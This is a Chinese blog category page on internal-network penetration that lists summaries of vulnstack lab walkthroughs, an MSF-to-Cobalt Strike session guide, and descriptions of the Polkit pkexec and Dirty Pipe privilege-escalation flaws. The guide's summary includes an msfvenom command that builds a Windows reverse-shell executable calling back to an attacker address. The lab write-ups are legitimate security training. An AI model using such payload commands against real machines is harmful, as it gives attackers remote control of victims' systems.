随笔分类 - 内网
摘要:这是两段时间打的靶场了,所以前后IP不一样。这样的网络配置三层域网络在:192.68.93.0的c段二层网络:有52的网段,也连通三层网络的93段DMZ:处于192.68.52.0的c段 与kali连通,若是不连通 获取权限后也就是多做一层代理只用到了 Vmnet1 和6 网卡 域用户账户和密码如下
阅读全文
摘要:MSF上线CS 1.MSF运行exe上线 先用msfvenom生成一个木马,这里是windows的木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload
阅读全文
摘要:环境搭建 参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 几个靶机IP信息 web-centos:两张网卡 外网一定要配置到NAT 之前傻逼了配的桥接导致出不了网 外网IP 192.168.255.130 内网IP 192.168.93.10
阅读全文
摘要:环境搭建 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ ubuntu上可以再启动一下docker docker start ec 17 09 bb da 3d ab ad 靶机信息 ubuntu:ubuntu 域成员机器 douser:Dotes
阅读全文
摘要:Linux Polkit 权限提升漏洞漏洞描述 Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。 近日,国外安全团队发布公告称,在 polkit 的 pkexec 程序中发现了一个本地权限提升漏洞。pkexec 应用程序是一
阅读全文
摘要:CVE-2022-0847 它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 它类似于CVE-2016-5195 “Dirty Cow”,但更容易被利用。 该漏洞已 在 Linux 5.16.11、5.15.2
阅读全文
